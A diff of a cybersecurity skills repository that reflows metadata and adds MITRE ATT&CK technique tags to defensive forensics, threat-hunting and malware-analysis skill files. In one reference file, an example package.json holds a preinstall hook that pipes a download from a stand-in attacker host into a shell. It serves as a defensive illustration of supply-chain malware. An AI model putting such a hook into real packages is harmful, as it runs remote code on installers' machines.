- T1003.001
- T1620
- T1564.001
---
# Analyzing Memory Forensics with LiME and Volatility
skills/analyzing-mft-for-deleted-file-recovery/SKILL.md
+7 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-mft-for-deleted-file-recovery
description: Analyze the NTFS Master File Table ($MFT) to recover metadata and content of deleted files by examining MFT record
entries, $LogFile, $UsnJrnl, and MFT slack space using MFTECmd, analyzeMFT, and X-Ways Forensics.
description: Analyze the NTFS Master File Table ($MFT) to recover metadata and content
of deleted files by examining MFT record entries, $LogFile, $UsnJrnl, and MFT slack
space using MFTECmd, analyzeMFT, and X-Ways Forensics.
domain: cybersecurity
subdomain: digital-forensics
tags:
@@ -23,6 +24,10 @@ nist_csf:
- RS.AN-03
- DE.AE-02
- RS.MA-01
mitre_attack:
- T1070.004
- T1070.006
- T1005
---
# Analyzing MFT for Deleted File Recovery
skills/analyzing-network-covert-channels-in-malware/SKILL.md
+8 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-network-covert-channels-in-malware
description: Detect and analyze covert communication channels used by malware including DNS tunneling, ICMP exfiltration,
steganographic HTTP, and protocol abuse for C2 and data exfiltration.
description: Detect and analyze covert communication channels used by malware including
DNS tunneling, ICMP exfiltration, steganographic HTTP, and protocol abuse for C2
and data exfiltration.
domain: cybersecurity
subdomain: malware-analysis
tags:
@@ -26,6 +27,11 @@ nist_csf:
- RS.AN-03
- ID.RA-01
- DE.CM-01
mitre_attack:
- T1071.001
- T1095
- T1572
- T1001
---
# Analyzing Network Covert Channels in Malware
skills/analyzing-network-flow-data-with-netflow/SKILL.md
+10 -3
View File
@@ -1,8 +1,10 @@
---
name: analyzing-network-flow-data-with-netflow
description: Parse NetFlow v9 and IPFIX records to detect volumetric anomalies, port scanning, data exfiltration, and C2 beaconing
patterns. Uses the Python netflow library to decode flow records, builds traffic baselines, and applies statistical analysis
to identify flows with abnormal byte counts, connection durations, and periodic timing patterns.
description: Parse NetFlow v9 and IPFIX records to detect volumetric anomalies, port
scanning, data exfiltration, and C2 beaconing patterns. Uses the Python netflow
library to decode flow records, builds traffic baselines, and applies statistical
analysis to identify flows with abnormal byte counts, connection durations, and
periodic timing patterns.
domain: cybersecurity
subdomain: network-security
tags:
@@ -18,6 +20,11 @@ nist_csf:
- DE.CM-01
- ID.AM-03
- PR.DS-02
mitre_attack:
- T1071
- T1048
- T1046
- T1095
---
skills/analyzing-network-packets-with-scapy/SKILL.md
+8 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-network-packets-with-scapy
description: Craft, send, sniff, and dissect network packets using Scapy for protocol analysis, network reconnaissance, and
traffic anomaly detection in authorized security testing
description: Craft, send, sniff, and dissect network packets using Scapy for protocol
analysis, network reconnaissance, and traffic anomaly detection in authorized security
testing
domain: cybersecurity
subdomain: network-security
tags:
@@ -19,6 +20,11 @@ nist_csf:
- DE.CM-01
- ID.AM-03
- PR.DS-02
mitre_attack:
- T1040
- T1071
- T1046
- T1557
---
# Analyzing Network Packets with Scapy
skills/analyzing-network-traffic-of-malware/SKILL.md
+10 -4
View File
@@ -1,9 +1,10 @@
---
name: analyzing-network-traffic-of-malware
description: 'Analyzes network traffic generated by malware during sandbox execution or live incident response to identify
C2 protocols, data exfiltration channels, payload downloads, and lateral movement patterns using Wireshark, Zeek, and Suricata.
Activates for requests involving malware network analysis, C2 traffic decoding, malware PCAP analysis, or network-based
malware detection.
description: 'Analyzes network traffic generated by malware during sandbox execution
or live incident response to identify C2 protocols, data exfiltration channels,
payload downloads, and lateral movement patterns using Wireshark, Zeek, and Suricata.
Activates for requests involving malware network analysis, C2 traffic decoding,
malware PCAP analysis, or network-based malware detection.
'
domain: cybersecurity
@@ -22,6 +23,11 @@ nist_csf:
- RS.AN-03
- ID.RA-01
- DE.CM-01
mitre_attack:
- T1071.001
- T1571
- T1573
- T1095
---
# Analyzing Network Traffic of Malware
skills/analyzing-network-traffic-with-wireshark/SKILL.md
+8 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-network-traffic-with-wireshark
description: 'Captures and analyzes network packet data using Wireshark and tshark to identify malicious traffic patterns,
diagnose protocol issues, extract artifacts, and support incident response investigations on authorized network segments.
description: 'Captures and analyzes network packet data using Wireshark and tshark
to identify malicious traffic patterns, diagnose protocol issues, extract artifacts,
and support incident response investigations on authorized network segments.
'
domain: cybersecurity
@@ -20,6 +21,11 @@ nist_csf:
- DE.CM-01
- ID.AM-03
- PR.DS-02
mitre_attack:
- T1040
- T1071
- T1557
- T1046
---
# Analyzing Network Traffic with Wireshark
skills/analyzing-office365-audit-logs-for-compromise/SKILL.md
+8 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-office365-audit-logs-for-compromise
description: Parse Office 365 Unified Audit Logs via Microsoft Graph API to detect email forwarding rule creation, inbox delegation,
suspicious OAuth app grants, and other indicators of account compromise.
description: Parse Office 365 Unified Audit Logs via Microsoft Graph API to detect
email forwarding rule creation, inbox delegation, suspicious OAuth app grants, and
other indicators of account compromise.
domain: cybersecurity
subdomain: cloud-security
tags:
@@ -20,6 +21,11 @@ nist_csf:
- ID.AM-08
- GV.SC-06
- DE.CM-01
mitre_attack:
- T1114.002
- T1098.002
- T1556.006
- T1078.004
---
# Analyzing Office 365 Audit Logs for Compromise
skills/analyzing-outlook-pst-for-email-forensics/SKILL.md
+8 -3
View File
@@ -1,8 +1,9 @@
---
name: analyzing-outlook-pst-for-email-forensics
description: Analyze Microsoft Outlook PST and OST files for email forensic evidence including message content, headers, attachments,
deleted items, and metadata using libpff, pst-utils, and forensic email analysis tools for legal investigations and incident
response.
description: Analyze Microsoft Outlook PST and OST files for email forensic evidence
including message content, headers, attachments, deleted items, and metadata using
libpff, pst-utils, and forensic email analysis tools for legal investigations and
incident response.
domain: cybersecurity
subdomain: digital-forensics
tags:
@@ -28,6 +29,10 @@ nist_csf:
- RS.AN-03
- DE.AE-02
- RS.MA-01
mitre_attack:
- T1114.001
- T1564.008
- T1070.008
---
# Analyzing Outlook PST for Email Forensics
skills/analyzing-packed-malware-with-upx-unpacker/SKILL.md
+9 -3
View File
@@ -1,8 +1,10 @@
---
name: analyzing-packed-malware-with-upx-unpacker
description: 'Identifies and unpacks UPX-packed and other packed malware samples to expose the original executable code for
static analysis. Covers both standard UPX unpacking and handling modified UPX headers that prevent automated decompression.
Activates for requests involving malware unpacking, UPX decompression, packer removal, or preparing packed samples for analysis.
description: 'Identifies and unpacks UPX-packed and other packed malware samples to
expose the original executable code for static analysis. Covers both standard UPX
unpacking and handling modified UPX headers that prevent automated decompression.
Activates for requests involving malware unpacking, UPX decompression, packer removal,
or preparing packed samples for analysis.
'
domain: cybersecurity
@@ -21,6 +23,10 @@ nist_csf:
- RS.AN-03
- ID.RA-01
- DE.CM-01
mitre_attack:
- T1027.002
- T1140
- T1620
---
# Analyzing Packed Malware with UPX Unpacker
skills/analyzing-pdf-malware-with-pdfid/SKILL.md
+10 -4
View File
@@ -1,9 +1,10 @@
---
name: analyzing-pdf-malware-with-pdfid
description: 'Analyzes malicious PDF files using PDFiD, pdf-parser, and peepdf to identify embedded JavaScript, shellcode,
exploits, and suspicious objects without opening the document. Determines the attack vector and extracts embedded payloads
for further analysis. Activates for requests involving PDF malware analysis, malicious document analysis, PDF exploit investigation,
or suspicious attachment triage.
description: 'Analyzes malicious PDF files using PDFiD, pdf-parser, and peepdf to
identify embedded JavaScript, shellcode, exploits, and suspicious objects without
opening the document. Determines the attack vector and extracts embedded payloads
for further analysis. Activates for requests involving PDF malware analysis, malicious
document analysis, PDF exploit investigation, or suspicious attachment triage.
'
domain: cybersecurity
@@ -22,6 +23,11 @@ nist_csf:
- RS.AN-03
- ID.RA-01
- DE.CM-01
mitre_attack:
- T1204.002
- T1566.001
- T1059.007
- T1027
---
# Analyzing PDF Malware with PDFiD
skills/analyzing-persistence-mechanisms-in-linux/SKILL.md
+4 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-persistence-mechanisms-in-linux
description: Detect and analyze Linux persistence mechanisms including crontab entries, systemd service units, LD_PRELOAD
hijacking, bashrc modifications, and authorized_keys backdoors using auditd and file integrity monitoring
description: Detect and analyze Linux persistence mechanisms including crontab entries,
systemd service units, LD_PRELOAD hijacking, bashrc modifications, and authorized_keys
backdoors using auditd and file integrity monitoring
domain: cybersecurity
subdomain: threat-hunting
tags:
@@ -17,6 +18,7 @@ mitre_attack:
- T1543.002
- T1574.006
- T1546.004
- T1098.004
version: '1.0'
author: mahipal
license: Apache-2.0
skills/analyzing-powershell-empire-artifacts/SKILL.md
+9 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-powershell-empire-artifacts
description: Detect PowerShell Empire framework artifacts in Windows event logs by identifying Base64 encoded launcher patterns,
default user agents, staging URL structures, stager IOCs, and known Empire module signatures in Script Block Logging events.
description: Detect PowerShell Empire framework artifacts in Windows event logs by
identifying Base64 encoded launcher patterns, default user agents, staging URL structures,
stager IOCs, and known Empire module signatures in Script Block Logging events.
domain: cybersecurity
subdomain: threat-hunting
tags:
@@ -32,6 +33,12 @@ nist_csf:
- DE.AE-02
- DE.AE-07
- ID.RA-05
mitre_attack:
- T1059.001
- T1071.001
- T1003.001
- T1558.003
- T1027.010
---
# Analyzing PowerShell Empire Artifacts
skills/analyzing-powershell-script-block-logging/SKILL.md
+15 -6
View File
@@ -1,15 +1,19 @@
---
name: analyzing-powershell-script-block-logging
description: Parse Windows PowerShell Script Block Logs (Event ID 4104) from EVTX files to detect obfuscated commands, encoded
payloads, and living-off-the-land techniques. Uses python-evtx to extract and reconstruct multi-block scripts, applies entropy
analysis and pattern matching for Base64-encoded commands, Invoke-Expression abuse, download cradles, and AMSI bypass attempts.
description: Parse Windows PowerShell Script Block Logs (Event ID 4104) from EVTX
files to detect obfuscated commands, encoded payloads, and living-off-the-land techniques.
Uses python-evtx to extract and reconstruct multi-block scripts, applies entropy
analysis and pattern matching for Base64-encoded commands, Invoke-Expression abuse,
download cradles, and AMSI bypass attempts.
domain: cybersecurity
subdomain: security-operations
tags:
- analyzing
- powershell
- script
- block
- script-block-logging
- event-id-4104
- obfuscation-detection
- windows-forensics
- endpoint-security
version: '1.0'
author: mahipal
license: Apache-2.0
@@ -18,6 +22,11 @@ nist_csf:
- RS.MA-01
- GV.OV-01
- DE.AE-02
mitre_attack:
- T1059.001
- T1027.010
- T1140
- T1105
---
skills/analyzing-prefetch-files-for-execution-history/SKILL.md
+7 -2
View File
@@ -1,7 +1,7 @@
---
name: analyzing-prefetch-files-for-execution-history
description: Parse Windows Prefetch files to determine program execution history including run counts, timestamps, and referenced
files for forensic investigation.
description: Parse Windows Prefetch files to determine program execution history including
run counts, timestamps, and referenced files for forensic investigation.
domain: cybersecurity
subdomain: digital-forensics
tags:
@@ -19,6 +19,11 @@ nist_csf:
- RS.AN-03
- DE.AE-02
- RS.MA-01
mitre_attack:
- T1059.001
- T1003.001
- T1021.002
- T1567.002
---
# Analyzing Prefetch Files for Execution History
skills/analyzing-ransomware-encryption-mechanisms/SKILL.md
+28 -4
View File
@@ -1,9 +1,10 @@
---
name: analyzing-ransomware-encryption-mechanisms
description: 'Analyzes encryption algorithms, key management, and file encryption routines used by ransomware families to
assess decryption feasibility, identify implementation weaknesses, and support recovery efforts. Covers AES, RSA, ChaCha20,
and hybrid encryption schemes. Activates for requests involving ransomware cryptanalysis, encryption analysis, key recovery
assessment, or ransomware decryption feasibility.
description: 'Analyzes encryption algorithms, key management, and file encryption
routines used by ransomware families to assess decryption feasibility, identify
implementation weaknesses, and support recovery efforts. Covers AES, RSA, ChaCha20,
and hybrid encryption schemes. Activates for requests involving ransomware cryptanalysis,
encryption analysis, key recovery assessment, or ransomware decryption feasibility.
'
domain: cybersecurity
@@ -22,6 +23,29 @@ nist_csf:
- RS.AN-03
- ID.RA-01
- DE.CM-01
mitre_attack:
- T1486
- T1573.001
- T1573.002
- T1027
mitre_f3:
version: '1.1'
tactics:
- monetization
- positioning
techniques:
- id: F1018
name: Convert to Cryptocurrency
tactic: monetization
source: f3
- id: F1047
name: Transfer of funds
tactic: monetization
source: f3
- id: T1219
name: Remote Access Tools
tactic: positioning
source: attack
---
# Analyzing Ransomware Encryption Mechanisms
skills/analyzing-ransomware-leak-site-intelligence/SKILL.md
+31 -3
View File
@@ -1,7 +1,8 @@
---
name: analyzing-ransomware-leak-site-intelligence
description: Monitor and analyze ransomware group data leak sites (DLS) to track victim postings, extract threat intelligence
on group tactics, and assess sector-specific ransomware risk for proactive defense.
description: Monitor and analyze ransomware group data leak sites (DLS) to track victim
postings, extract threat intelligence on group tactics, and assess sector-specific
ransomware risk for proactive defense.
domain: cybersecurity
subdomain: threat-intelligence
tags:
@@ -10,7 +11,7 @@ tags:
- data-leak
- extortion
- threat-intelligence
- monitoring
- leak-site-monitoring
- dls
- victim-tracking
version: '1.0'
@@ -21,6 +22,33 @@ nist_csf:
- ID.RA-05
- DE.CM-01
- DE.AE-02
mitre_attack:
- T1657
- T1486
- T1567.002
- T1591
mitre_f3:
version: '1.1'
tactics:
- monetization
- reconnaissance
techniques:
- id: F1018
name: Convert to Cryptocurrency
tactic: monetization
source: f3
- id: F1029
name: Gather Customer Information
tactic: reconnaissance
source: f3
- id: T1593
name: Search Open Websites/Domains
tactic: reconnaissance
source: attack
- id: F1025.003
name: 'Electronic Funds Transfer: Wire Transfer'
tactic: monetization
source: f3
---
# Analyzing Ransomware Leak Site Intelligence
skills/analyzing-ransomware-network-indicators/SKILL.md
+27 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-ransomware-network-indicators
description: Identify ransomware network indicators including C2 beaconing patterns, TOR exit node connections, data exfiltration
flows, and encryption key exchange via Zeek conn.log and NetFlow analysis
description: Identify ransomware network indicators including C2 beaconing patterns,
TOR exit node connections, data exfiltration flows, and encryption key exchange
via Zeek conn.log and NetFlow analysis
domain: cybersecurity
subdomain: threat-hunting
tags:
@@ -26,6 +27,30 @@ nist_csf:
- DE.AE-02
- DE.AE-07
- ID.RA-05
mitre_attack:
- T1071.001
- T1573
- T1048
- T1567.002
- T1486
mitre_f3:
version: '1.1'
tactics:
- positioning
- monetization
techniques:
- id: T1219
name: Remote Access Tools
tactic: positioning
source: attack
- id: F1018
name: Convert to Cryptocurrency
tactic: monetization
source: f3
- id: F1047
name: Transfer of funds
tactic: monetization
source: f3
---
# Analyzing Ransomware Network Indicators
skills/analyzing-ransomware-payment-wallets/SKILL.md
+35 -4
View File
@@ -1,9 +1,11 @@
---
name: analyzing-ransomware-payment-wallets
description: 'Traces ransomware cryptocurrency payment flows using blockchain analysis tools such as Chainalysis Reactor,
WalletExplorer, and blockchain.com APIs. Identifies wallet clusters, tracks fund movement through mixers and exchanges,
and supports law enforcement attribution. Activates for requests involving ransomware payment tracing, bitcoin wallet analysis,
cryptocurrency forensics, or blockchain intelligence gathering.
description: 'Traces ransomware cryptocurrency payment flows using blockchain analysis
tools such as Chainalysis Reactor, WalletExplorer, and blockchain.com APIs. Identifies
wallet clusters, tracks fund movement through mixers and exchanges, and supports
law enforcement attribution. Activates for requests involving ransomware payment
tracing, bitcoin wallet analysis, cryptocurrency forensics, or blockchain intelligence
gathering.
'
domain: cybersecurity
@@ -23,6 +25,35 @@ nist_csf:
- RS.MA-01
- RC.RP-01
- PR.IR-01
mitre_attack:
- T1657
- T1486
mitre_f3:
version: '1.1'
tactics:
- monetization
- stealth
techniques:
- id: F1018
name: Convert to Cryptocurrency
tactic: monetization
source: f3
- id: F1017
name: Conversion to Physical Monetary Instruments
tactic: monetization
source: f3
- id: F1017.001
name: 'Conversion to Physical Monetary Instruments: Cash'
tactic: monetization
source: f3
- id: F1047
name: Transfer of funds
tactic: monetization
source: f3
- id: F1045
name: Structuring
tactic: stealth
source: f3
---
# Analyzing Ransomware Payment Wallets
skills/analyzing-sbom-for-supply-chain-vulnerabilities/SKILL.md
+11 -4
View File
@@ -1,9 +1,11 @@
---
name: analyzing-sbom-for-supply-chain-vulnerabilities
description: 'Parses Software Bill of Materials (SBOM) in CycloneDX and SPDX JSON formats to identify supply chain vulnerabilities
by correlating components against the NVD CVE database via the NVD 2.0 API. Builds dependency graphs, calculates risk scores,
identifies transitive vulnerability paths, and generates compliance reports. Activates for requests involving SBOM analysis,
software composition analysis, supply chain security assessment, dependency vulnerability scanning, CycloneDX/SPDX parsing,
description: 'Parses Software Bill of Materials (SBOM) in CycloneDX and SPDX JSON
formats to identify supply chain vulnerabilities by correlating components against
the NVD CVE database via the NVD 2.0 API. Builds dependency graphs, calculates risk
scores, identifies transitive vulnerability paths, and generates compliance reports.
Activates for requests involving SBOM analysis, software composition analysis, supply
chain security assessment, dependency vulnerability scanning, CycloneDX/SPDX parsing,
or CVE correlation.
'
@@ -36,6 +38,11 @@ nist_csf:
- GV.SC-03
- GV.SC-06
- GV.SC-07
mitre_attack:
- T1195.001
- T1195.002
- T1554
- T1190
---
# Analyzing SBOM for Supply Chain Vulnerabilities
skills/analyzing-security-logs-with-splunk/SKILL.md
+11 -7
View File
@@ -1,9 +1,11 @@
---
name: analyzing-security-logs-with-splunk
description: 'Leverages Splunk Enterprise Security and SPL (Search Processing Language) to investigate security incidents
through log correlation, timeline reconstruction, and anomaly detection. Covers Windows event logs, firewall logs, proxy
logs, and authentication data analysis. Activates for requests involving Splunk investigation, SPL queries, SIEM log analysis,
security event correlation, or log-based incident investigation.
description: 'Leverages Splunk Enterprise Security and SPL (Search Processing Language)
to investigate security incidents through log correlation, timeline reconstruction,
and anomaly detection. Covers Windows event logs, firewall logs, proxy logs, and
authentication data analysis. Activates for requests involving Splunk investigation,
SPL queries, SIEM log analysis, security event correlation, or log-based incident
investigation.
'
domain: cybersecurity
@@ -15,9 +17,11 @@ tags:
- log-analysis
- security-monitoring
mitre_attack:
- T1070
- T1562
- T1059
- T1110
- T1550.002
- T1021.001
- T1059.001
- T1003.001
version: 1.0.0
author: mahipal
license: Apache-2.0
skills/analyzing-slack-space-and-file-system-artifacts/SKILL.md
+8 -2
View File
@@ -1,7 +1,7 @@
---
name: analyzing-slack-space-and-file-system-artifacts
description: Examine file system slack space, MFT entries, USN journal, and alternate data streams to recover hidden data
and reconstruct file activity on NTFS volumes.
description: Examine file system slack space, MFT entries, USN journal, and alternate
data streams to recover hidden data and reconstruct file activity on NTFS volumes.
domain: cybersecurity
subdomain: digital-forensics
tags:
@@ -20,6 +20,12 @@ nist_csf:
- RS.AN-03
- DE.AE-02
- RS.MA-01
mitre_attack:
- T1070.006
- T1564.004
- T1070.004
- T1005
- T1006
---
# Analyzing Slack Space and File System Artifacts
skills/analyzing-supply-chain-malware-artifacts/SKILL.md
+9 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-supply-chain-malware-artifacts
description: Investigate supply chain attack artifacts including trojanized software updates, compromised build pipelines,
and sideloaded dependencies to identify intrusion vectors and scope of compromise.
description: Investigate supply chain attack artifacts including trojanized software
updates, compromised build pipelines, and sideloaded dependencies to identify intrusion
vectors and scope of compromise.
domain: cybersecurity
subdomain: malware-analysis
tags:
@@ -33,6 +34,12 @@ nist_csf:
- RS.AN-03
- ID.RA-01
- DE.CM-01
mitre_attack:
- T1195.002
- T1195.001
- T1554
- T1553.002
- T1027
---
# Analyzing Supply Chain Malware Artifacts
skills/analyzing-supply-chain-malware-artifacts/references/api-reference.md
+1 -1
View File
@@ -77,7 +77,7 @@ cosign verify-blob --signature file.sig --certificate file.crt artifact.tar.gz
```json
{
"scripts": {
"preinstall": "curl evil.com/payload | sh",
"preinstall": "curl evil[.]example/payload | sh",
"postinstall": "node ./install.js",
"preuninstall": "node cleanup.js"
}
skills/analyzing-threat-actor-ttps-with-mitre-attack/SKILL.md
+9 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-threat-actor-ttps-with-mitre-attack
description: MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics, techniques, and procedures (TTPs)
based on real-world observations. This skill covers systematically mapping threat actor beh
description: MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics,
techniques, and procedures (TTPs) based on real-world observations. This skill covers
systematically mapping threat actor beh
domain: cybersecurity
subdomain: threat-intelligence
tags:
@@ -26,6 +27,12 @@ nist_csf:
- ID.RA-05
- DE.CM-01
- DE.AE-02
mitre_attack:
- T1566.001
- T1059.001
- T1071.001
- T1547.001
- T1053.005
---
# Analyzing Threat Actor TTPs with MITRE ATT&CK
skills/analyzing-threat-actor-ttps-with-mitre-navigator/SKILL.md
+12 -4
View File
@@ -1,9 +1,11 @@
---
name: analyzing-threat-actor-ttps-with-mitre-navigator
description: 'Map advanced persistent threat (APT) group tactics, techniques, and procedures (TTPs) to the MITRE ATT&CK framework
using the ATT&CK Navigator and attackcti Python library. The analyst queries STIX/TAXII data for group-technique associations,
generates Navigator layer files for visualization, and compares defensive coverage against adversary profiles. Activates
for requests involving APT TTP mapping, ATT&CK Navigator layers, threat actor profiling, or MITRE technique coverage analysis.
description: 'Map advanced persistent threat (APT) group tactics, techniques, and
procedures (TTPs) to the MITRE ATT&CK framework using the ATT&CK Navigator and attackcti
Python library. The analyst queries STIX/TAXII data for group-technique associations,
generates Navigator layer files for visualization, and compares defensive coverage
against adversary profiles. Activates for requests involving APT TTP mapping, ATT&CK
Navigator layers, threat actor profiling, or MITRE technique coverage analysis.
'
domain: cybersecurity
@@ -38,6 +40,12 @@ nist_csf:
- ID.RA-05
- DE.CM-01
- DE.AE-02
mitre_attack:
- T1566.001
- T1059.001
- T1071.001
- T1547.001
- T1053.005
---
# Analyzing Threat Actor TTPs with MITRE Navigator
skills/analyzing-threat-intelligence-feeds/SKILL.md
+12 -4
View File
@@ -1,9 +1,11 @@
---
name: analyzing-threat-intelligence-feeds
description: 'Analyzes structured and unstructured threat intelligence feeds to extract actionable indicators, adversary tactics,
and campaign context. Use when ingesting commercial or open-source CTI feeds, evaluating feed quality, normalizing data
into STIX 2.1 format, or enriching existing IOCs with campaign attribution. Activates for requests involving ThreatConnect,
Recorded Future, Mandiant Advantage, MISP, AlienVault OTX, or automated feed aggregation pipelines.
description: 'Analyzes structured and unstructured threat intelligence feeds to extract
actionable indicators, adversary tactics, and campaign context. Use when ingesting
commercial or open-source CTI feeds, evaluating feed quality, normalizing data into
STIX 2.1 format, or enriching existing IOCs with campaign attribution. Activates
for requests involving ThreatConnect, Recorded Future, Mandiant Advantage, MISP,
AlienVault OTX, or automated feed aggregation pipelines.
'
domain: cybersecurity
@@ -26,6 +28,12 @@ nist_csf:
- ID.RA-05
- DE.CM-01
- DE.AE-02
mitre_attack:
- T1071.001
- T1566
- T1568
- T1583.001
- T1102
---
# Analyzing Threat Intelligence Feeds
skills/analyzing-threat-landscape-with-misp/SKILL.md
+17 -8
View File
@@ -1,16 +1,19 @@
---
name: analyzing-threat-landscape-with-misp
description: Analyze the threat landscape using MISP (Malware Information Sharing Platform) by querying event statistics,
attribute distributions, threat actor galaxy clusters, and tag trends over time. Uses PyMISP to pull event data, compute
IOC type breakdowns, identify top threat actors and malware families, and generate threat landscape reports with temporal
trends.
description: Analyze the threat landscape using MISP (Malware Information Sharing
Platform) by querying event statistics, attribute distributions, threat actor galaxy
clusters, and tag trends over time. Uses PyMISP to pull event data, compute IOC
type breakdowns, identify top threat actors and malware families, and generate threat
landscape reports with temporal trends.
domain: cybersecurity
subdomain: threat-intelligence
tags:
- analyzing
- threat
- landscape
- with
- threat-intelligence
- misp
- threat-landscape
- ioc-analysis
- cti
- threat-sharing
version: '1.0'
author: mahipal
license: Apache-2.0
@@ -25,6 +28,12 @@ nist_csf:
- ID.RA-05
- DE.CM-01
- DE.AE-02
mitre_attack:
- T1566
- T1071.001
- T1568
- T1583.001
- T1102
---
skills/analyzing-tls-certificate-transparency-logs/SKILL.md
+41 -6
View File
@@ -1,17 +1,20 @@
---
name: analyzing-tls-certificate-transparency-logs
description: 'Queries Certificate Transparency logs via crt.sh and pycrtsh to detect phishing domains, unauthorized certificate
issuance, and shadow IT. Monitors newly issued certificates for typosquatting and brand impersonation using Levenshtein
description: 'Queries Certificate Transparency logs via crt.sh and pycrtsh to detect
phishing domains, unauthorized certificate issuance, and shadow IT. Monitors newly
issued certificates for typosquatting and brand impersonation using Levenshtein
distance. Use for proactive phishing domain detection and certificate monitoring.
'
domain: cybersecurity
subdomain: security-operations
tags:
- analyzing
- tls
- certificate
- transparency
- certificate-transparency
- ct-logs
- crt-sh
- phishing-detection
- tls-monitoring
- security-operations
version: '1.0'
author: mahipal
license: Apache-2.0
@@ -23,6 +26,38 @@ nist_csf:
- RS.MA-01
- GV.OV-01
- DE.AE-02
mitre_attack:
- T1583.001
- T1566.002
- T1598.003
- T1583.006
mitre_f3:
version: '1.1'
tactics:
- reconnaissance
- resource-development
- initial-access
techniques:
- id: T1598
name: Phishing for Information
tactic: reconnaissance
source: attack
- id: T1593
name: Search Open Websites/Domains
tactic: reconnaissance
source: attack
- id: T1583.001
name: 'Acquire Infrastructure: Domains'
tactic: resource-development
source: attack
- id: F1020.002
name: 'Create Fake Materials: Fake Website'
tactic: resource-development
source: f3
- id: T1660
name: Phishing
tactic: initial-access
source: attack
---
# Analyzing TLS Certificate Transparency Logs
skills/analyzing-typosquatting-domains-with-dnstwist/SKILL.md
+35 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-typosquatting-domains-with-dnstwist
description: Detect typosquatting, homograph phishing, and brand impersonation domains using dnstwist to generate domain permutations
and identify registered lookalike domains targeting your organization.
description: Detect typosquatting, homograph phishing, and brand impersonation domains
using dnstwist to generate domain permutations and identify registered lookalike
domains targeting your organization.
domain: cybersecurity
subdomain: threat-intelligence
tags:
@@ -24,6 +25,38 @@ nist_csf:
- ID.RA-05
- DE.CM-01
- DE.AE-02
mitre_attack:
- T1583.001
- T1566.002
- T1598.003
- T1583.006
mitre_f3:
version: '1.1'
tactics:
- resource-development
- reconnaissance
- initial-access
techniques:
- id: T1583.001
name: 'Acquire Infrastructure: Domains'
tactic: resource-development
source: attack
- id: F1020.002
name: 'Create Fake Materials: Fake Website'
tactic: resource-development
source: f3
- id: T1598
name: Phishing for Information
tactic: reconnaissance
source: attack
- id: T1593
name: Search Open Websites/Domains
tactic: reconnaissance
source: attack
- id: T1660
name: Phishing
tactic: initial-access
source: attack
---
# Analyzing Typosquatting Domains with DNSTwist
skills/analyzing-uefi-bootkit-persistence/SKILL.md
+13 -5
View File
@@ -1,10 +1,12 @@
---
name: analyzing-uefi-bootkit-persistence
description: 'Analyzes UEFI bootkit persistence mechanisms including firmware implants in SPI flash, EFI System Partition
(ESP) modifications, Secure Boot bypass techniques, and UEFI variable manipulation. Covers detection of known bootkit families
(BlackLotus, LoJax, MosaicRegressor, MoonBounce, CosmicStrand), ESP partition forensic inspection, chipsec-based firmware
integrity verification, and Secure Boot configuration auditing. Activates for requests involving UEFI malware analysis,
firmware persistence investigation, boot chain integrity verification, or Secure Boot bypass detection.
description: 'Analyzes UEFI bootkit persistence mechanisms including firmware implants
in SPI flash, EFI System Partition (ESP) modifications, Secure Boot bypass techniques,
and UEFI variable manipulation. Covers detection of known bootkit families (BlackLotus,
LoJax, MosaicRegressor, MoonBounce, CosmicStrand), ESP partition forensic inspection,
chipsec-based firmware integrity verification, and Secure Boot configuration auditing.
Activates for requests involving UEFI malware analysis, firmware persistence investigation,
boot chain integrity verification, or Secure Boot bypass detection.
'
domain: cybersecurity
@@ -30,6 +32,12 @@ nist_csf:
- ID.RA-01
- PR.PS-01
- PR.PS-02
mitre_attack:
- T1542.001
- T1542.003
- T1553.006
- T1542
- T1014
---
# Analyzing UEFI Bootkit Persistence
skills/analyzing-usb-device-connection-history/SKILL.md
+8 -2
View File
@@ -1,7 +1,7 @@
---
name: analyzing-usb-device-connection-history
description: Investigate USB device connection history from Windows registry, event logs, and setupapi logs to track removable
media usage and potential data exfiltration.
description: Investigate USB device connection history from Windows registry, event
logs, and setupapi logs to track removable media usage and potential data exfiltration.
domain: cybersecurity
subdomain: digital-forensics
tags:
@@ -19,6 +19,12 @@ nist_csf:
- RS.AN-03
- DE.AE-02
- RS.MA-01
mitre_attack:
- T1052.001
- T1025
- T1091
- T1005
- T1074.001
---
# Analyzing USB Device Connection History
skills/analyzing-web-server-logs-for-intrusion/SKILL.md
+18 -7
View File
@@ -1,15 +1,20 @@
---
name: analyzing-web-server-logs-for-intrusion
description: Parse Apache and Nginx access logs to detect SQL injection attempts, local file inclusion, directory traversal,
web scanner fingerprints, and brute-force patterns. Uses regex-based pattern matching against OWASP attack signatures, GeoIP
enrichment for source attribution, and statistical anomaly detection for request frequency and response size outliers.
description: Parse Apache and Nginx access logs to detect SQL injection attempts,
local file inclusion, directory traversal, web scanner fingerprints, and brute-force
patterns. Uses regex-based pattern matching against OWASP attack signatures, GeoIP
enrichment for source attribution, and statistical anomaly detection for request
frequency and response size outliers.
domain: cybersecurity
subdomain: security-operations
tags:
- analyzing
- web
- server
- logs
- web-log-analysis
- apache-logs
- nginx-logs
- sql-injection-detection
- lfi-detection
- directory-traversal
- intrusion-detection
version: '1.0'
author: mahipal
license: Apache-2.0
@@ -18,6 +23,12 @@ nist_csf:
- RS.MA-01
- GV.OV-01
- DE.AE-02
mitre_attack:
- T1190
- T1059.007
- T1110
- T1595.002
- T1505.003
---
skills/analyzing-windows-amcache-artifacts/SKILL.md
+13 -4
View File
@@ -1,9 +1,12 @@
---
name: analyzing-windows-amcache-artifacts
description: 'Parses and analyzes the Windows Amcache.hve registry hive to extract evidence of program execution, application
installation, and driver loading for digital forensics investigations. Uses Eric Zimmerman''s AmcacheParser and Timeline
Explorer for artifact extraction, SHA-1 hash correlation with threat intel, and timeline reconstruction. Activates for requests
involving Amcache forensics, program execution evidence, Windows artifact analysis, or application compatibility cache investigation.
